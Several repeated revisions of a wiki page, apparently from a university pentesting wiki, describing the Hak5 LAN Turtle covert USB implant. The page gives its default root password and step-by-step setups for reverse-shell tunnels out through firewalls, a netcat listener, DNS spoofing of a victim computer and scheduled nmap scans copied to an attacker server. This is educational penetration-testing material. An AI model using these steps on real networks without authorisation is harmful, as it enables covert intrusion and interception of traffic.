&lt;br /&gt;
[[File:LANTurtleModules.jpg|400px||LAN Turtle configuration shell interface]]&lt;br /&gt;
&lt;br /&gt;
==== Manually download turtle modules ====&lt;br /&gt;
If the module manager doesn&#039;t work you need to manually download turtle modules. You can do that in the console of the lan turtle, just exit the main menu.&lt;br /&gt;
You can download modules from the [https://github.com/hak5/lanturtle-modules/tree/gh-pages/modules official hak5 github].&lt;br /&gt;
&lt;br /&gt;
# Change directory to &amp;lt;code&amp;gt;/etc/turtle/modules&amp;lt;/code&amp;gt;&lt;br /&gt;
# Download modules with &amp;lt;code&amp;gt;wget &amp;lt;link&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
# Make the file an executeable &amp;lt;code&amp;gt;chmod +x &amp;lt;file&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== AutoSSH ====&lt;br /&gt;
&lt;br /&gt;
AutoSSH is a service which provides persistent SSH connections. If an SSH session drops, it will be quickly re-established by AutoSSH. This service is typically used to provide a convenient and persistent reverse shell into the LAN Turtle on the standard SSH port 22 - though it may be configured with any standard SSH parameters to forward any arbitrary port.&lt;br /&gt;
*&amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; - The username and hostname (DNS or IP) separated by @ for which to establish the SSH connection.&lt;br /&gt;
*&amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; - The port number from which the remote server will bind.&lt;br /&gt;
*&amp;lt;code&amp;gt;listen port&amp;lt;/code&amp;gt; - The port number to which the remote port will bind.&lt;br /&gt;
&lt;br /&gt;
Example: Per the defaults, the remote server will bind its local port 2222 back to the LAN Turtle port 22. In this scenario one may establish a persistent connection to their LAN Turtle from this reverse shell by first connecting to the public server, and then from there establishing an SSH connection to port 2222.&lt;br /&gt;
&lt;br /&gt;
==== Cron ====&lt;br /&gt;
Cron is a job scheduler which can be used to start and stop modules at specific times or regular intervals using the &#039;start&#039; and &#039;stop&#039; commands.&lt;br /&gt;
&lt;br /&gt;
==== DNSSpoof ====&lt;br /&gt;
DNSSpoof forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks. For example, the IP address returned for a client lookup of the domain \&amp;quot;example.com\&amp;quot; can be replaced with that of the LAN Turtle itself, or a 3rd party server. In this scenario, the computer connected to the Internet through the LAN Turtle attempting to browse to this domain may be redirected to the spoofed IP.&lt;br /&gt;
&lt;br /&gt;
==== Keymanager ====&lt;br /&gt;
With this tool you can create RSA keypairs and copy them to the public server. This is needed when AutoSSH is configured.&lt;br /&gt;
&lt;br /&gt;
==== Meterpreter ====&lt;br /&gt;
This module deploys an persistent shell to the Metasploit Framework of an other Machine.&lt;br /&gt;
&lt;br /&gt;
==== Nmap-Scan ====&lt;br /&gt;
This module uses &amp;lt;code&amp;gt;nmap&amp;lt;/code&amp;gt; for discovering running devices and their port of the current LAN network.&lt;br /&gt;
&lt;br /&gt;
==== OpenVPN ====&lt;br /&gt;
OpenVPN enables remote access the LAN Turtle and optionally the network on which it resides. It allows to send the captured data to your operating network.&lt;br /&gt;
&lt;br /&gt;
==== SSHFS====&lt;br /&gt;
SSHFS (Secure SHell FileSystem) is a file system for Linux (and other operating systems with a FUSE implementation, such as Mac OS X or FreeBSD) capable of operating on files on a remote computer using just a secure shell login on the remote computer. On the local computer where the SSHFS is mounted, the implementation makes use of the FUSE (Filesystem in Userspace) kernel module. The practical effect of this is that the end user can seamlessly interact with remote files being securely served over SSH just as if they were local files on his/her computer. On the remote computer the SFTP subsystem of SSH is used.&lt;br /&gt;
&lt;br /&gt;
==== URLSnarf ====&lt;br /&gt;
URLSnarf allows you to capture which websites were accessed by the plugged in computer. URLSnarf only works with HTTP webpages which are hard to find today.&lt;br /&gt;
&lt;br /&gt;
==== NetCat Reverse Shell ====&lt;br /&gt;
The netcat reverse shell provides you with remote access to the lan turtle and thus persistent access to the network.&lt;br /&gt;
&lt;br /&gt;
== Use Cases==&lt;br /&gt;
&lt;br /&gt;
The LAN turtle can be deployed in various use cases, which can be divided into three categories:&lt;br /&gt;
* remote access attacks with AutoSSH or OpenVPN or NetCat Reverse Shell&lt;br /&gt;
* man-in-the-middle attacks with URLSnarf or DNSSpoof&lt;br /&gt;
* information gathering with Nmap-Scan&lt;br /&gt;
&lt;br /&gt;
Remote access attacks are used to gain access to a private network from a remote place in order to start further attacks from the inside network. This makes it a lot more easier because the attack itself does not have to bypass a router or firewall. All the attacker needs is the pre-configured LAN turtle inside the network and a remote server on the internet. To perform a remote access, the LAN turtle builds up a tunnel to the remote server so the firewall cannot capture the traffic. Finally the attacker can access the LAN turtle through the tunnel from the remote server. This attack can be performed with the modules AutoSSH or OpenVPN.&lt;br /&gt;
&lt;br /&gt;
The LAN turtle also allows man-in-the-middle attacks, where the turtle can intercept the communication between two parties. To perform such an attack, the LAN turtle must be connected to an USB port of the victim host and to a network cable which connects the host to the internal LAN. Now the whole traffic of the victim host goes over the LAN turtle and can be logged or altered. An attacker can use URLSnarf or DNSSpoof to perform such an attack.&lt;br /&gt;
&lt;br /&gt;
The last use case is information gathering. The aim of this attack is to receive information about the topology, the hosts and the protocols of an internal network in order to perform further attacks. This can be done with the modules like Nmap-Scan.&lt;br /&gt;
&lt;br /&gt;
The following step-by-step instructions will outline how to configure the LAN turtle in order to perform the different types of attacks.&lt;br /&gt;
&lt;br /&gt;
=== Remote access attacks with AutoSSH ===&lt;br /&gt;
In this example consider an internal network which is secured by a firewall and a public server in the internet controlled by the attacker.&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Generate RSA keypairs with Keymanager ====&lt;br /&gt;
# Open the Keymanager module and select &amp;lt;code&amp;gt;generate_key&amp;lt;/code&amp;gt;&lt;br /&gt;
# Select &amp;lt;code&amp;gt;copy_key&amp;lt;/code&amp;gt; and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; remote SSH server port (typically 22)&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; user on the remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;password&amp;lt;/code&amp;gt; password for the user on the remote host&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Configure AutoSSH ====&lt;br /&gt;
# Open AutoSSH and insert the following parameters:&lt;br /&gt;
#* &amp;lt;code&amp;gt;user@host&amp;lt;/code&amp;gt; user and host to establish the SSH tunnel&lt;br /&gt;
#* &amp;lt;code&amp;gt;remote port&amp;lt;/code&amp;gt; remote port to bind through the SSH tunnel (default 2222)&lt;br /&gt;
#* &amp;lt;code&amp;gt;local port&amp;lt;/code&amp;gt; local port to bind tunnel (default 22)&lt;br /&gt;
# Submit the changes and start AutoSSH (or enable it for autostart)&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Access LAN turtle from remote server ====&lt;br /&gt;
# Connect to the remote server&lt;br /&gt;
# Connect locally to the remote port of the AutoSSH configuration by &amp;lt;code&amp;gt;ssh root@localhost:2222&amp;lt;/code&amp;gt;&lt;br /&gt;
# You are now on the LAN turtle, continue with further attacks&lt;br /&gt;
&lt;br /&gt;
=== Remote access attacks with NetCat Reverse Shell ===&lt;br /&gt;
==== Step 1: Start NetCat server on your host machine ====&lt;br /&gt;
# To start NetCat server execute &amp;lt;code&amp;gt;nc -lvp 4444&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Configure NetCat Reverse Shell ====&lt;br /&gt;
# Open the NetCat Rever Shell module and go to &amp;quot;Configure&amp;quot;&lt;br /&gt;
# Enter your host machines ip address and the port of the nc server. In our case 4444.&lt;br /&gt;
&lt;br /&gt;
==== Step 3: Exploit ====&lt;br /&gt;
When the reverse shell connected to your host machine you can execute commands on the lan turtle.&lt;br /&gt;
&lt;br /&gt;
=== Man-in-the-middle attacks with DNSSpoof ===&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure the spoofhost file ====&lt;br /&gt;
# Open the DNSSpoof module and go to &amp;quot;Configure&amp;quot;&lt;br /&gt;
# Add the DNS entries that the LAN turtle should spoof by entering the IP address and the spoofed DNS name&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Place the LAN turtle in the network ====&lt;br /&gt;
After configuring the spoofed hosts, place the LAN turtle on the victim computer by simply plugging the turtle into an USB port of the computer and the network cable into the LAN turtle.&lt;br /&gt;
&lt;br /&gt;
=== Information Gathering with nmap ===&lt;br /&gt;
As an example project we use the following modules:&lt;br /&gt;
* Cron to periodically start the attack&lt;br /&gt;
* SSHFS to save the caputred information in a file on the remote server&lt;br /&gt;
* Nmap-Scan to sniff the configuration and devices of the network&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure SSHFS ====&lt;br /&gt;
# Access the SSHFS module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; IP address of the remote server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; 22&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; the username&lt;br /&gt;
#* &amp;lt;code&amp;gt;path&amp;lt;/code&amp;gt; This can be left blank if you want to use the users home directory&lt;br /&gt;
# Start SSHFS and enable it for start up&lt;br /&gt;
&lt;br /&gt;
==== Step 2: nmap-scan ====&lt;br /&gt;
# Access the nmap-scan module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* target: &amp;lt;code&amp;gt;192.168.0.1-255&amp;lt;/code&amp;gt; (This may differ for our network)&lt;br /&gt;
#* logflie: &amp;lt;code&amp;gt;/sshfs/&amp;lt;/code&amp;gt;&lt;br /&gt;
#* use the desired attack profile&lt;br /&gt;
#* save the configuration with execute&lt;br /&gt;
&lt;br /&gt;
==== Step 3: cron job ====&lt;br /&gt;
# add in the con config &amp;lt;code&amp;gt;*/15 * * * * start nmap-scan&amp;lt;/code&amp;gt;&lt;br /&gt;
This line start an nmap-scan every 15 minutes.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[LAN Turtle]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000979313-LAN-Turtle&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6084</id>
		<title>Hak5 LAN Turtle</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6084"/>
		<updated>2021-03-04T14:07:01Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Use Cases */ Added Remote Accces via NetCat Reverse Shell&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:LANTurtle.jpg |thumb|right|400px||LAN Turtle and Field Guide]]&lt;br /&gt;
The LAN turtle is a tool for penetration testers and system administrators disguised as a simple USB Ethernet adapter. It provides possibilities to perform remote access, man-in-the-middle and information gathering attacks. These functions are provided by the turtle modules which are preinstalled on the LAN turtle. The modules are based on the OpenWRT platform which allow users to add customized modules. The turtle itself is covert by a generic USB to Ethernet adapter and can therefore be placed unnoticed in IT infrastructures.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Setting up the LAN Turtle ===&lt;br /&gt;
&lt;br /&gt;
# Plug the LAN turtle into one of the USB ports of your computer.&lt;br /&gt;
# Your computer will get an 172.16.84.x address as soon as the startup sequence of the turtle finished. If not, then you have to statically configure an IP out of the 172.16.84.0/24 range.&lt;br /&gt;
# Connect to the turtle with &amp;lt;code&amp;gt;ssh root@172.16.84.1&amp;lt;/code&amp;gt; and enter the password &amp;lt;code&amp;gt;sh3llz&amp;lt;/code&amp;gt;&lt;br /&gt;
# The simplistic graphical shell interface will prompt you to change the password but the old one is also allowed.&lt;br /&gt;
# Then the LAN turtle can be configured and modules can be installed within the interface. &lt;br /&gt;
# If you end the interface you will be greeted with an normal Linux shell but you can open it again with the &amp;lt;code&amp;gt;turtle&amp;lt;/code&amp;gt; command&lt;br /&gt;
&lt;br /&gt;
=== Updating firmware (optional) ===&lt;br /&gt;
To ensure the best performance and compatability you should update the firmware regularly. This requires an internet conneciton.&lt;br /&gt;
&lt;br /&gt;
# Select &amp;lt;code&amp;gt;Config&amp;lt;/code&amp;gt; in the Main Menu and press select.&lt;br /&gt;
# Go to &amp;lt;code&amp;gt;Check for updates&amp;lt;/code&amp;gt; and press select to start the update process.&lt;br /&gt;
&lt;br /&gt;
=== Using the turtle modules ===&lt;br /&gt;
&lt;br /&gt;
The LAN turtle comes packed with pre-installed tools. Furthermore it is possible to program your own or download them from the internet and configure them with the module manager as well.&lt;br /&gt;
&lt;br /&gt;
[[File:LANTurtleModules.jpg|400px||LAN Turtle configuration shell interface]]&lt;br /&gt;
&lt;br /&gt;
==== Manually download turtle modules ====&lt;br /&gt;
If the module manager doesn&#039;t work you need to manually download turtle modules. You can do that in the console of the lan turtle, just exit the main menu.&lt;br /&gt;
You can download modules from the [https://github.com/hak5/lanturtle-modules/tree/gh-pages/modules official hak5 github].&lt;br /&gt;
&lt;br /&gt;
# Change directory to &amp;lt;code&amp;gt;/etc/turtle/modules&amp;lt;/code&amp;gt;&lt;br /&gt;
# Download modules with &amp;lt;code&amp;gt;wget &amp;lt;link&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
# Make the file an executeable &amp;lt;code&amp;gt;chmod +x &amp;lt;file&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== AutoSSH ====&lt;br /&gt;
&lt;br /&gt;
AutoSSH is a service which provides persistent SSH connections. If an SSH session drops, it will be quickly re-established by AutoSSH. This service is typically used to provide a convenient and persistent reverse shell into the LAN Turtle on the standard SSH port 22 - though it may be configured with any standard SSH parameters to forward any arbitrary port.&lt;br /&gt;
*&amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; - The username and hostname (DNS or IP) separated by @ for which to establish the SSH connection.&lt;br /&gt;
*&amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; - The port number from which the remote server will bind.&lt;br /&gt;
*&amp;lt;code&amp;gt;listen port&amp;lt;/code&amp;gt; - The port number to which the remote port will bind.&lt;br /&gt;
&lt;br /&gt;
Example: Per the defaults, the remote server will bind its local port 2222 back to the LAN Turtle port 22. In this scenario one may establish a persistent connection to their LAN Turtle from this reverse shell by first connecting to the public server, and then from there establishing an SSH connection to port 2222.&lt;br /&gt;
&lt;br /&gt;
==== Cron ====&lt;br /&gt;
Cron is a job scheduler which can be used to start and stop modules at specific times or regular intervals using the &#039;start&#039; and &#039;stop&#039; commands.&lt;br /&gt;
&lt;br /&gt;
==== DNSSpoof ====&lt;br /&gt;
DNSSpoof forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks. For example, the IP address returned for a client lookup of the domain \&amp;quot;example.com\&amp;quot; can be replaced with that of the LAN Turtle itself, or a 3rd party server. In this scenario, the computer connected to the Internet through the LAN Turtle attempting to browse to this domain may be redirected to the spoofed IP.&lt;br /&gt;
&lt;br /&gt;
==== Keymanager ====&lt;br /&gt;
With this tool you can create RSA keypairs and copy them to the public server. This is needed when AutoSSH is configured.&lt;br /&gt;
&lt;br /&gt;
==== Meterpreter ====&lt;br /&gt;
This module deploys an persistent shell to the Metasploit Framework of an other Machine.&lt;br /&gt;
&lt;br /&gt;
==== Nmap-Scan ====&lt;br /&gt;
This module uses &amp;lt;code&amp;gt;nmap&amp;lt;/code&amp;gt; for discovering running devices and their port of the current LAN network.&lt;br /&gt;
&lt;br /&gt;
==== OpenVPN ====&lt;br /&gt;
OpenVPN enables remote access the LAN Turtle and optionally the network on which it resides. It allows to send the captured data to your operating network.&lt;br /&gt;
&lt;br /&gt;
==== SSHFS====&lt;br /&gt;
SSHFS (Secure SHell FileSystem) is a file system for Linux (and other operating systems with a FUSE implementation, such as Mac OS X or FreeBSD) capable of operating on files on a remote computer using just a secure shell login on the remote computer. On the local computer where the SSHFS is mounted, the implementation makes use of the FUSE (Filesystem in Userspace) kernel module. The practical effect of this is that the end user can seamlessly interact with remote files being securely served over SSH just as if they were local files on his/her computer. On the remote computer the SFTP subsystem of SSH is used.&lt;br /&gt;
&lt;br /&gt;
==== URLSnarf ====&lt;br /&gt;
URLSnarf allows you to capture which websites were accessed by the plugged in computer. URLSnarf only works with HTTP webpages which are hard to find today.&lt;br /&gt;
&lt;br /&gt;
==== NetCat Reverse Shell ====&lt;br /&gt;
The netcat reverse shell provides you with remote access to the lan turtle and thus persistent access to the network.&lt;br /&gt;
&lt;br /&gt;
== Use Cases==&lt;br /&gt;
&lt;br /&gt;
The LAN turtle can be deployed in various use cases, which can be divided into three categories:&lt;br /&gt;
* remote access attacks with AutoSSH or OpenVPN or NetCat Reverse Shell&lt;br /&gt;
* man-in-the-middle attacks with URLSnarf or DNSSpoof&lt;br /&gt;
* information gathering with Nmap-Scan&lt;br /&gt;
&lt;br /&gt;
Remote access attacks are used to gain access to a private network from a remote place in order to start further attacks from the inside network. This makes it a lot more easier because the attack itself does not have to bypass a router or firewall. All the attacker needs is the pre-configured LAN turtle inside the network and a remote server on the internet. To perform a remote access, the LAN turtle builds up a tunnel to the remote server so the firewall cannot capture the traffic. Finally the attacker can access the LAN turtle through the tunnel from the remote server. This attack can be performed with the modules AutoSSH or OpenVPN.&lt;br /&gt;
&lt;br /&gt;
The LAN turtle also allows man-in-the-middle attacks, where the turtle can intercept the communication between two parties. To perform such an attack, the LAN turtle must be connected to an USB port of the victim host and to a network cable which connects the host to the internal LAN. Now the whole traffic of the victim host goes over the LAN turtle and can be logged or altered. An attacker can use URLSnarf or DNSSpoof to perform such an attack.&lt;br /&gt;
&lt;br /&gt;
The last use case is information gathering. The aim of this attack is to receive information about the topology, the hosts and the protocols of an internal network in order to perform further attacks. This can be done with the modules like Nmap-Scan.&lt;br /&gt;
&lt;br /&gt;
The following step-by-step instructions will outline how to configure the LAN turtle in order to perform the different types of attacks.&lt;br /&gt;
&lt;br /&gt;
=== Remote access attacks with AutoSSH ===&lt;br /&gt;
In this example consider an internal network which is secured by a firewall and a public server in the internet controlled by the attacker.&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Generate RSA keypairs with Keymanager ====&lt;br /&gt;
# Open the Keymanager module and select &amp;lt;code&amp;gt;generate_key&amp;lt;/code&amp;gt;&lt;br /&gt;
# Select &amp;lt;code&amp;gt;copy_key&amp;lt;/code&amp;gt; and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; remote SSH server port (typically 22)&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; user on the remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;password&amp;lt;/code&amp;gt; password for the user on the remote host&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Configure AutoSSH ====&lt;br /&gt;
# Open AutoSSH and insert the following parameters:&lt;br /&gt;
#* &amp;lt;code&amp;gt;user@host&amp;lt;/code&amp;gt; user and host to establish the SSH tunnel&lt;br /&gt;
#* &amp;lt;code&amp;gt;remote port&amp;lt;/code&amp;gt; remote port to bind through the SSH tunnel (default 2222)&lt;br /&gt;
#* &amp;lt;code&amp;gt;local port&amp;lt;/code&amp;gt; local port to bind tunnel (default 22)&lt;br /&gt;
# Submit the changes and start AutoSSH (or enable it for autostart)&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Access LAN turtle from remote server ====&lt;br /&gt;
# Connect to the remote server&lt;br /&gt;
# Connect locally to the remote port of the AutoSSH configuration by &amp;lt;code&amp;gt;ssh root@localhost:2222&amp;lt;/code&amp;gt;&lt;br /&gt;
# You are now on the LAN turtle, continue with further attacks&lt;br /&gt;
&lt;br /&gt;
=== Remote access attacks with NetCat Reverse Shell ===&lt;br /&gt;
==== Step 1: Start NetCat server on your host machine ====&lt;br /&gt;
# To start NetCat server execute &amp;lt;code&amp;gt;nc -lvp 4444&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Configure NetCat Reverse Shell ====&lt;br /&gt;
# Open the NetCat Rever Shell module and go to &amp;quot;Configure&amp;quot;&lt;br /&gt;
# Enter your host machines ip address and the port of the nc server. In our case 4444.&lt;br /&gt;
&lt;br /&gt;
==== Step 3: Exploit ====&lt;br /&gt;
* When the reverse shell connected to your host machine you can execute commands on the lan turtle.&lt;br /&gt;
&lt;br /&gt;
=== Man-in-the-middle attacks with DNSSpoof ===&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure the spoofhost file ====&lt;br /&gt;
# Open the DNSSpoof module and go to &amp;quot;Configure&amp;quot;&lt;br /&gt;
# Add the DNS entries that the LAN turtle should spoof by entering the IP address and the spoofed DNS name&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Place the LAN turtle in the network ====&lt;br /&gt;
After configuring the spoofed hosts, place the LAN turtle on the victim computer by simply plugging the turtle into an USB port of the computer and the network cable into the LAN turtle.&lt;br /&gt;
&lt;br /&gt;
=== Information Gathering with nmap ===&lt;br /&gt;
As an example project we use the following modules:&lt;br /&gt;
* Cron to periodically start the attack&lt;br /&gt;
* SSHFS to save the caputred information in a file on the remote server&lt;br /&gt;
* Nmap-Scan to sniff the configuration and devices of the network&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure SSHFS ====&lt;br /&gt;
# Access the SSHFS module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; IP address of the remote server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; 22&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; the username&lt;br /&gt;
#* &amp;lt;code&amp;gt;path&amp;lt;/code&amp;gt; This can be left blank if you want to use the users home directory&lt;br /&gt;
# Start SSHFS and enable it for start up&lt;br /&gt;
&lt;br /&gt;
==== Step 2: nmap-scan ====&lt;br /&gt;
# Access the nmap-scan module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* target: &amp;lt;code&amp;gt;192.168.0.1-255&amp;lt;/code&amp;gt; (This may differ for our network)&lt;br /&gt;
#* logflie: &amp;lt;code&amp;gt;/sshfs/&amp;lt;/code&amp;gt;&lt;br /&gt;
#* use the desired attack profile&lt;br /&gt;
#* save the configuration with execute&lt;br /&gt;
&lt;br /&gt;
==== Step 3: cron job ====&lt;br /&gt;
# add in the con config &amp;lt;code&amp;gt;*/15 * * * * start nmap-scan&amp;lt;/code&amp;gt;&lt;br /&gt;
This line start an nmap-scan every 15 minutes.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[LAN Turtle]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000979313-LAN-Turtle&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6083</id>
		<title>Hak5 LAN Turtle</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6083"/>
		<updated>2021-03-04T14:02:06Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Using the turtle modules */  Added netcat reverse shell&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:LANTurtle.jpg |thumb|right|400px||LAN Turtle and Field Guide]]&lt;br /&gt;
The LAN turtle is a tool for penetration testers and system administrators disguised as a simple USB Ethernet adapter. It provides possibilities to perform remote access, man-in-the-middle and information gathering attacks. These functions are provided by the turtle modules which are preinstalled on the LAN turtle. The modules are based on the OpenWRT platform which allow users to add customized modules. The turtle itself is covert by a generic USB to Ethernet adapter and can therefore be placed unnoticed in IT infrastructures.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Setting up the LAN Turtle ===&lt;br /&gt;
&lt;br /&gt;
# Plug the LAN turtle into one of the USB ports of your computer.&lt;br /&gt;
# Your computer will get an 172.16.84.x address as soon as the startup sequence of the turtle finished. If not, then you have to statically configure an IP out of the 172.16.84.0/24 range.&lt;br /&gt;
# Connect to the turtle with &amp;lt;code&amp;gt;ssh root@172.16.84.1&amp;lt;/code&amp;gt; and enter the password &amp;lt;code&amp;gt;sh3llz&amp;lt;/code&amp;gt;&lt;br /&gt;
# The simplistic graphical shell interface will prompt you to change the password but the old one is also allowed.&lt;br /&gt;
# Then the LAN turtle can be configured and modules can be installed within the interface. &lt;br /&gt;
# If you end the interface you will be greeted with an normal Linux shell but you can open it again with the &amp;lt;code&amp;gt;turtle&amp;lt;/code&amp;gt; command&lt;br /&gt;
&lt;br /&gt;
=== Updating firmware (optional) ===&lt;br /&gt;
To ensure the best performance and compatability you should update the firmware regularly. This requires an internet conneciton.&lt;br /&gt;
&lt;br /&gt;
# Select &amp;lt;code&amp;gt;Config&amp;lt;/code&amp;gt; in the Main Menu and press select.&lt;br /&gt;
# Go to &amp;lt;code&amp;gt;Check for updates&amp;lt;/code&amp;gt; and press select to start the update process.&lt;br /&gt;
&lt;br /&gt;
=== Using the turtle modules ===&lt;br /&gt;
&lt;br /&gt;
The LAN turtle comes packed with pre-installed tools. Furthermore it is possible to program your own or download them from the internet and configure them with the module manager as well.&lt;br /&gt;
&lt;br /&gt;
[[File:LANTurtleModules.jpg|400px||LAN Turtle configuration shell interface]]&lt;br /&gt;
&lt;br /&gt;
==== Manually download turtle modules ====&lt;br /&gt;
If the module manager doesn&#039;t work you need to manually download turtle modules. You can do that in the console of the lan turtle, just exit the main menu.&lt;br /&gt;
You can download modules from the [https://github.com/hak5/lanturtle-modules/tree/gh-pages/modules official hak5 github].&lt;br /&gt;
&lt;br /&gt;
# Change directory to &amp;lt;code&amp;gt;/etc/turtle/modules&amp;lt;/code&amp;gt;&lt;br /&gt;
# Download modules with &amp;lt;code&amp;gt;wget &amp;lt;link&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
# Make the file an executeable &amp;lt;code&amp;gt;chmod +x &amp;lt;file&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== AutoSSH ====&lt;br /&gt;
&lt;br /&gt;
AutoSSH is a service which provides persistent SSH connections. If an SSH session drops, it will be quickly re-established by AutoSSH. This service is typically used to provide a convenient and persistent reverse shell into the LAN Turtle on the standard SSH port 22 - though it may be configured with any standard SSH parameters to forward any arbitrary port.&lt;br /&gt;
*&amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; - The username and hostname (DNS or IP) separated by @ for which to establish the SSH connection.&lt;br /&gt;
*&amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; - The port number from which the remote server will bind.&lt;br /&gt;
*&amp;lt;code&amp;gt;listen port&amp;lt;/code&amp;gt; - The port number to which the remote port will bind.&lt;br /&gt;
&lt;br /&gt;
Example: Per the defaults, the remote server will bind its local port 2222 back to the LAN Turtle port 22. In this scenario one may establish a persistent connection to their LAN Turtle from this reverse shell by first connecting to the public server, and then from there establishing an SSH connection to port 2222.&lt;br /&gt;
&lt;br /&gt;
==== Cron ====&lt;br /&gt;
Cron is a job scheduler which can be used to start and stop modules at specific times or regular intervals using the &#039;start&#039; and &#039;stop&#039; commands.&lt;br /&gt;
&lt;br /&gt;
==== DNSSpoof ====&lt;br /&gt;
DNSSpoof forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks. For example, the IP address returned for a client lookup of the domain \&amp;quot;example.com\&amp;quot; can be replaced with that of the LAN Turtle itself, or a 3rd party server. In this scenario, the computer connected to the Internet through the LAN Turtle attempting to browse to this domain may be redirected to the spoofed IP.&lt;br /&gt;
&lt;br /&gt;
==== Keymanager ====&lt;br /&gt;
With this tool you can create RSA keypairs and copy them to the public server. This is needed when AutoSSH is configured.&lt;br /&gt;
&lt;br /&gt;
==== Meterpreter ====&lt;br /&gt;
This module deploys an persistent shell to the Metasploit Framework of an other Machine.&lt;br /&gt;
&lt;br /&gt;
==== Nmap-Scan ====&lt;br /&gt;
This module uses &amp;lt;code&amp;gt;nmap&amp;lt;/code&amp;gt; for discovering running devices and their port of the current LAN network.&lt;br /&gt;
&lt;br /&gt;
==== OpenVPN ====&lt;br /&gt;
OpenVPN enables remote access the LAN Turtle and optionally the network on which it resides. It allows to send the captured data to your operating network.&lt;br /&gt;
&lt;br /&gt;
==== SSHFS====&lt;br /&gt;
SSHFS (Secure SHell FileSystem) is a file system for Linux (and other operating systems with a FUSE implementation, such as Mac OS X or FreeBSD) capable of operating on files on a remote computer using just a secure shell login on the remote computer. On the local computer where the SSHFS is mounted, the implementation makes use of the FUSE (Filesystem in Userspace) kernel module. The practical effect of this is that the end user can seamlessly interact with remote files being securely served over SSH just as if they were local files on his/her computer. On the remote computer the SFTP subsystem of SSH is used.&lt;br /&gt;
&lt;br /&gt;
